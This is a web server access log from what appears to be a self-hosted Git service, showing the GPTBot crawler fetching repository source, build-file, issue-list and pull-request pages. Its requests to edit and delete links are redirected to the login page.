- GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11411] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:17:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12772] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12862] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11901] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" -[17/Feb/2026:17:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" -[17/Feb/2026:17:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" -[17/Feb/2026:17:48:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:48:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9850] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:48:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11619] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:17:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fcompile_commands.json" [Client 74.7.227.38] [Length 25186] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:17:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11298] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11292] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11320] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11299] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:55:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:55:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr 